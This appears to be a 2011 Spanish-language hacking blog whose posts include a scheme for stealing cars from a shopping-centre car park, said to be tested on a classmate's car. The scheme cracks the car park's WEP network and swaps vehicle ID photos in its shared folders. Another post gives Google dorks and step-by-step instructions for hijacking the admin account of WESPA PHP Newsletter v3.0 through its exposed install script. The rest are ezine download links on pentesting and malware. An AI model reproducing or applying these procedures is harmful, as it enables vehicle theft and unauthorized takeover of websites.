1- Al ingresar el Automovil al parqueadero 2 camaras de Distintos Angulos Toma Foto Trasera y Delantera del Auto

2- El Encargado Asigna un ID No Ocupado en la Lista a dichas Imagenes.

Este Id Ya lo tiene un Carnet Escrito.

Ejemplo del id: P1F567890

P1= piso 1

F5= Carril F Columna 5

67890= No se con certeza, pero Supongo que es un Distintivo

3- Dejas las llaves del Auto y ya esta.. ir de compras

4- Al Terminar todo vas y Entregas El carnet Automaticamente ellos Van y te Dan tu Auto.

Donde esta la falla Que no la Veo?

Se me Habia Olvidado Decirles Que Al Entrar al parqueadero Hay una Entrada y una Salida... no esta Demas decirles.. porque Es un Punto Esencial .. Si es una Estupidez Aclararlo pero Por que es Esencial?

Al momento de Entrar...

Tu Id es Enviado a la Salida Con las Imagenes de tu Auto

ENTRADA = Se toman Fotos del Auto te asignan id y dejas tus llaves

-------

SALIDA= Recibe Mediante WLAN tu Id y las Imagenes del Auto

Demanera que Cuando Llegues.. das El carnet con tal ID ellos Buscan dicho ID veran las imagenes de tu Auto y te Llevan El Auto junto con las Llaves...

Hasta Ahora Todo va Bien No?

Punto.. la WLAN Tiene una Clave WEP

Como todos Sabemos Con Algunas Tools Algo de Paciencia y Un Poco De buen uso de ellas podemos Obtener Dicha Clave..

Como Aprovechar La Falla?

Simple.. Simple y muy SIMPLE!
una Vez Dentro de la red podemos ver Carpetas Compartidas!!!

Hay Un problema.. como no tenemos El Soft Del parqueadero nos tocara Buscar de Forma manual nuestro ID

Pero Es tambien Sencillo, ya que este Esta En carpetas Categorizadas por los cuantro primeros caracteres

EJEMPLO: Carpeta P1F1 - P1F2 -P1F3 P1F4 -P1F5

hay Esta la de Nuestro ID p1F5, Entramos y buscamos el codigo que en Nuestro caso es... 67890 hay veremos varias carpetas En horarios y dias

Solo buscamos la fecha y la hora y veremos Nuestras Imagenes del Auto.

Hasta Aqui todo va Bien

Se preguntaran? Como obtengo un Auto...

SACRIFICIO!

Deberas buscar Otro Automovil en esos Horarios de Ingreso y cambiarle el iD por el tuyo y el id de el lo pones en tu Auto Asi Al llevar el carnet te daran El Automovil De las Fotos!

Conclusion. Algo Arriesgado Muy Comprometedor, pero Si tienes un Auto MUY Viejo Obtendras una Camioneta XD.. nahh mentiras Esto No va orientado al robo Solo es Explicacion profunda de una Falla que esta en muchos Almacenes que reservo su nombre.. CARREFOUR - ALMACENES FALLABAELLA XD entre Otros..

Nota: Este articulo fue aplicado en un centro comercial de la ciudad xxxxxx donde el objetivo era el automovil de un compañero de clases, este metodo fue satisfactorio ya que el salio con mi auto y yo con el de el... esto se aplico de cierta manera por si se presentaba algun inconveniente en la seguridad.

ACLARACION!!!!

Este Metodo Se Aplica para los usuarios que dejan las llaves de Sus Automoviles... pero hay los que no! Tengan mucho cuidado en ese punto por que no ah de ir a reclamar un Auto que su Dueño no dejo llaves.

GreeTz

Todos los Users de Diosdelared - Cyberlocos

Camaradas totales Xzite - linuxfer - DarkSpark - w0rm - nouter - 1410 -Golden - Karl - Cpuma - Esteban - Entre otros mas Que no recuerdo

Ezine [Hablemos de Shells]

2011-05-21T20:01:00.000-07:00

Al no tener nada que hacer ni idea de que publicar, se me dio la idea de introducir mas el conocimiento sobre las shells, su historia, que hacen y demas espero les guste ;)!

Descarga: Multiupload

"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install Path"

2011-05-20T17:14:00.000-07:00

Bueno leyendo un poco sobre las ultimas vulnerabilidades lei en el blog de mi amigo [PANDEMIC] sobre el cambio de contraseña remota por medio del PATH de instalacion, y aqui os pongo un ejemplo basico y directo de una falla [CRITICA].

1- Dork: intitle:"News list Administration panel"
intitle:"WESPA PHP Newsletter v3.0"

2- Dirigirse a la url webconwespa.com/newsletter/admin.php

3- Borrar de la url "admin.php" y dirigirse a el PATH /newsletter/install/install1.php y nos imprimira la configuracion

4- En el campo de PASSWD podemos modificarlo por una contraseña nueva.

Config establecida

Config editada

5- una vez hecho estos cambios procedemos a guardar la config "NEXT STAGE" y "FINISH INSTALL".

6- Una vez hecho esto podemos dirigirnos a la pagina de Adm PATH:/newsletter/admin.php o simplemente click en: "Goto the admin page" como se muestra en la imagen, ingresamos los nuevos datos o los que visualizamos anteriormente en la config y ya estariamos dentro!.

NOTA: listo ya una vez dentro podemos dejarle una nota al administrador para que Arregle o Fixee dicho fallo.

Ezine [Bug Hunting Basico]

2011-05-15T18:12:00.000-07:00

Descarga: Mediafire

Ezine [Scripting Python]

2011-05-15T09:03:00.000-07:00

Descarga: Multiupload

Ezine [Iniciando en Java]

2011-05-15T09:00:00.000-07:00

Otra entrega para los que inician en java, con Nuestro queridisimo amigo SnakingMax

Descarga: Mediafire

Ezine [Aprendiendo PHP]

2011-05-15T08:56:00.000-07:00

Información:
Primero que nada quiero pedir disculpas por entregar esta unidad más tarde de lo establecido, pero todos saben que siempre salen imprevistos. Esta unidad abarca temas esenciales los cuales los introduciran en este hermoso lenguaje. A continuación les dejo un índice de temas.

Indice de temas:

Acerca del autor
Introducción
¿Cómo trabajaremos?
¿Qué editor utilizaremos?
PHP
MySQL
Hola mundo
Comentarios
Incrustar código
Incrustar PHP en HTML
Incrustar HTML en PHP
Incrustar HTML en PHP II
Variables
¿Cómo saber el tipo de variable?
Funciones específicas para comprobar diferente tipo de variable
Otra forma de nombrar a las variables
Asignar valor por referencia
Constantes
Operadores
Operadores aritméticos
Operadores de asignación
Operadores comparativos
Operadores lógicos
Operadores de incrementación y disminución
Condicionales
if, else y elseif
switch
Bucles
While
Do While
For
Foreach
Formularios
Método POST
Método GET
Procesar formulario en la misma página
Ejercicios
Recomendaciones

Dudas:
Las dudas deberan ser posteadas en el foro de PHP
(http://www.underc0de.org/foro/index.php?board=81.0)

con el siguiente formato:

Título: [Taller de PHP] - Título de tu duda

Comentarios:
Los comentarios o sugerencias deberan hacerlos en este hilo.

Descarga: Multiupload

Ezine [Malwares]

2011-05-15T08:51:00.000-07:00

Bueno aqui publicando otra ezine, creada por ANTRAX sobre malwares y subtemas

Descarga: Multiupload

Ezine [Pentesting desde 0 Metasploit]

2011-05-14T15:51:00.000-07:00

Bueno aqui otra ezine .DOC creada por mi compañero de Taller [DasrkSpark] donde explica la utilizacion de Herramienta Metasploit desde lo basico.

Espero les sea de su agrado y el Sabado lanzaremos mas ezines y videos Gracias!!

Descarga: Multiupload

Ezine [Inicios en el Pentesting]

2011-05-14T14:04:00.000-07:00

Bueno despues de un tiempo promoviendo en la comunidad UNDERC0DE los talleres de profundizacion y estudio, decido lanzar la primera ezine introductoria newbie para los que se adentran en la maravillosa practica del pentesting.

Espero les guste, mas adelante voy publicando mas, y avanzando el nivel de experiencia y dificultad.

Descarga: Multiupload